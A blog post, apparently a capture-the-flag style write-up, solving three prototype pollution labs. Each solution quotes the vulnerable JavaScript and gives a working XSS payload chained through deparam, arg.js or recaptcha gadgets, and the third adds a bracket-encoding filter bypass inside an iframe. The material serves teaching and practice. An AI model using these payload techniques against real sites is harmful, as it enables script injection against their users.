<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Prototype Pollution Vulnerable Labs | 1n73rc3p70r-B10g | Welcome to MY Blog</title>

  
  <meta name="author" content="Sayooj B Kumar">
  

  
  <meta name="description" content="place where i post my findings,ctf write-ups">
  

  
  
  <meta name="keywords" content="Prototype_Pollution">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="Prototype Pollution Vulnerable Labs"/>

  <meta property="og:site_name" content="1n73rc3p70r-B10g"/>

  
  <meta property="og:image" content="/blog/favicon.ico"/>
  

  <link href="/blog/favicon.ico" rel="icon">
  <link rel="alternate" href="/blog/atom.xml" title="1n73rc3p70r-B10g" type="application/atom+xml">
  <link rel="stylesheet" href="/blog/css/style.css" media="screen" type="text/css">
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
<div class="blog">
  <div class="content">

    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/blog/">1n73rc3p70r-B10g</a>
    </h1>
    <p class="site-description">Welcome to MY Blog</p>
  </div>
  <nav class="site-navigation">
    <ul>
      
    </ul>
  </nav>
</header>

    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>Prototype Pollution Vulnerable Labs</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/blog/2021/08/24/ppvl/" rel="bookmark">
        <time class="entry-date published" datetime="2021-08-23T18:30:00.000Z">
          2021-08-24
        </time>
      </a>
    </span>
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        <p><strong>tl;dr</strong></p>
<ul>
<li>Lab1 - Prototype pollution in deparam when combined with reddit platform.js turns out to be xss</li>
<li>Lab2 - Prototype pollution to Xss via arg.js</li>
<li>Lab3 - Prototype pollution to Xss via recaptcha <span id="more"></span></li>
</ul>
<p><strong>Number of Challenges:</strong> 3</p>
<p><strong>Challenge Author:</strong> <a target="_blank" rel="noopener" href="https://twitter.com/WHOISbinit">WHOISbinit</a></p>
<p><strong>Hosted Challenge:</strong> <a target="_blank" rel="noopener" href="https://ppvl.whoisbinit.me/">here</a></p>
<h2 id="Challenge-Overview"><a href="#Challenge-Overview" class="headerlink" title="Challenge Overview"></a>Challenge Overview</h2><p>Few labs based client side Prototype Pollution.</p>
<h2 id="Solutions"><a href="#Solutions" class="headerlink" title="Solutions"></a>Solutions</h2><p><strong>Lab - I:</strong></p>
<p>Looking into <code>main.js</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">window.onload = () =&gt; &#123;</span><br><span class="line">    let fragments = location.hash.slice(1);</span><br><span class="line">    if (fragments !== &quot;&quot;) localStorage.setItem(&quot;ppvl&quot;, fragments);</span><br><span class="line">    deparam(atob(localStorage.getItem(&quot;ppvl&quot;)));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>Js takes input from location.hash and then place them in local storage then passed to deparam() which is <a target="_blank" rel="noopener" href="https://snyk.io/vuln/SNYK-JS-JQUERYDEPARAM-1255651">vulnerable to Prototype Pollution</a>.</p>
<p>Redit <code>platform.js</code> can be chained with <a target="_blank" rel="noopener" href="https://gist.github.com/keerok/52aa04c35aeb68a383727e978010a47a">Prototype Pollution to get xss</a></p>
<p>Payload:</p>
<ul>
<li><code>__proto__[onload]=alert(1)</code> </li>
<li><code>https://ppvl.whoisbinit.me/lab1/#X19wcm90b19fW29ubG9hZF09YWxlcnQoMSk=</code> </li>
</ul>
<p><strong>Lab - II:</strong></p>
<p>Looking into <code>main.js</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">let data = &#123;</span><br><span class="line">    small: &quot;Hi, there!&quot;,</span><br><span class="line">    big: &quot;Hello, world!&quot;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">const vuln = document.querySelector(&quot;#vuln&quot;);</span><br><span class="line">let queryStrings = window.location.search;</span><br><span class="line">let params = new URLSearchParams(queryStrings);</span><br><span class="line"></span><br><span class="line">let vulnParams = () =&gt; &#123;</span><br><span class="line">    let fragments = Arg.parse(location.hash.substr(1));</span><br><span class="line">    if(data[params.get(&quot;type&quot;)] !== undefined) vuln.innerHTML = &quot;&lt;h2&gt;&quot;+data[params.get(&quot;type&quot;)]+&quot;&lt;/h2&quot;;</span><br><span class="line">    else vuln.innerHTML = &quot;&lt;h2&gt;This region seems like something you need to look at.&lt;/h2&gt;&quot;;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">window.onhashchange = () =&gt; &#123;</span><br><span class="line">    vulnParams();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">vulnParams();</span><br></pre></td></tr></table></figure>

<p>We have a object called data and <code>queryStrings</code> is passed into <a target="_blank" rel="noopener" href="https://developer.mozilla.org/en-US/docs/Web/API/URLSearchParams">URLSearchParams()</a>. <a target="_blank" rel="noopener" href="https://github.com/BlackFan/client-side-prototype-pollution/blob/master/pp/arg-js.md">Args.parse is vulnerable to Prototype Pollution</a> and take data value from <code>params.get(&quot;type&quot;)</code> place them to innerHTML which means direct xss if we can pollute object and add value.So <code>data[params.get(&quot;type&quot;)]</code> get polluted.</p>
<p>Payload:</p>
<ul>
<li><code>constructor[prototype][test]=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E</code> </li>
<li><code>https://ppvl.whoisbinit.me/lab2/?type=test#constructor[prototype][test]=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E</code> </li>
</ul>
<p><strong>Lab - III:</strong></p>
<p>Looking into <code>main.js</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">let v = document.querySelector(&quot;#vuln&quot;),</span><br><span class="line">    r = document.createElement(&quot;p&quot;),</span><br><span class="line">    u = window.location != window.parent.location ? document.referrer : document.location;</span><br><span class="line">r.setAttribute(&quot;class&quot;, &quot;g-recaptcha&quot;), r.setAttribute(&quot;data-sitekey&quot;, &quot;HighlySecurePrototypes&quot;), v.appendChild(r), setTimeout(() =&gt; &#123;</span><br><span class="line">    ~u.indexOf(&quot;https://ppvl.whoisbinit.me&quot;) &amp;&amp; deparam(decodeURI(location.hash.slice(1).replace(/\[\]/i, &quot;&quot;)))</span><br><span class="line">&#125;, .1337);</span><br></pre></td></tr></table></figure>

<p><code>u = window.location != window.parent.location ? document.referrer : document.location;</code><br>If the condition fails we get an object in u which does not have property indexOf() Where code fails at<br><code>~u.indexOf(&quot;https://ppvl.whoisbinit.me&quot;)</code>.<br>So we have to make <code>window.location != window.parent.location</code> to be true.<br>Inorder to make parent and rendering frame different we have to add the challenge in iframe where location of both differs condition gets satisfied.</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&quot;https://ppvl.whoisbinit.me/lab3&quot; width=&quot;1000&quot; height=&quot;1000&quot;&gt;</span><br></pre></td></tr></table></figure>

<p><code>~u.indexOf(&quot;https://ppvl.whoisbinit.me&quot;) &amp;&amp; deparam(decodeURI(location.hash.slice(1).replace(/\[\]/i, &quot;&quot;)))</code></p>
<p>If <code>~u.indexOf(&quot;https://ppvl.whoisbinit.me&quot;)</code> fails it returns -1 and ~-1 is 0. 0 &amp;&amp; someobject returns 0 so prototype pollution fails and any number other than 0 Logical And with object returns the object itself.So we have to satisfy this condition too .u is document.referrer which gives details such as where did the current viewed document loaded or referred from .In parent document just give a get request like this <code>http://localhost/pp_labs.php?bypass=https://ppvl.whoisbinit.me</code> So the condition <code>u.indexOf(&quot;https://ppvl.whoisbinit.me&quot;)</code> get satisfied in child document(iframe).</p>
<p><code>decodeURI(location.hash.slice(1).replace(/\[\]/i,&quot;&quot;)))</code> This just replaced [ and ] which means we can’t have something like  <code>__proto__[test]</code> as it get replaced.<code> __proto__.test</code> is also away but deparam doesn’t consider <code>test</code> <a target="_blank" rel="noopener" href="https://openbase.com/js/jquery-deparam">as <strong>proto</strong> property</a> inorder to bypass this restriction we have decodeURI which decode urlencoded to corresponding ascii so we can give [ as %5B and ] as %5D which fails to get detected at regex check.</p>
<p>Payload:</p>
<p>deparam.js is vulnerable to Prototype Pollution and <code>recaptcha/api.js</code> is <a target="_blank" rel="noopener" href="https://github.com/BlackFan/client-side-prototype-pollution/blob/master/gadgets/recaptcha.md">vulnerable to xss when combined with Prototype Pollution</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;iframe src=&quot;https://ppvl.whoisbinit.me/lab3/#__proto__%5Bsrcdoc%5D%5B%5D=&lt;script&gt;alert(1)&lt;/script&gt;&quot; width=&quot;1000&quot; height=&quot;1000&quot;&gt;</span><br></pre></td></tr></table></figure>

<h2 id="Rating"><a href="#Rating" class="headerlink" title="Rating:"></a>Rating:</h2><p>7/10</p>

      
    </div>

  </div>

  <div class="article-footer">
    <div class="article-meta pull-left">

    
      

    <span class="post-categories">
      <i class="icon-categories"></i>
        <a href="/blog/categories/Web-Exploitation/">Web Exploitation</a>, <a href="/blog/categories/Web-Exploitation/Labs/">Labs</a>
    </span>
    

    
    

    <span class="post-tags">
      <i class="icon-tags"></i>
        <a href="/blog/tags/Prototype-Pollution/">Prototype_Pollution</a>
    </span>
    

    </div>

    
  </div>
</article>

  






    </main>

    <footer class="site-footer">
  <p class="site-info">
    Proudly powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and
    Theme by <a href="https://github.com/CodeDaraW/Hacker" target="_blank">Hacker</a>
    </br>
    
    &copy; 2021 Sayooj B Kumar
    
  </p>
</footer>
    
    
  </div>
</div>
</body>
</html>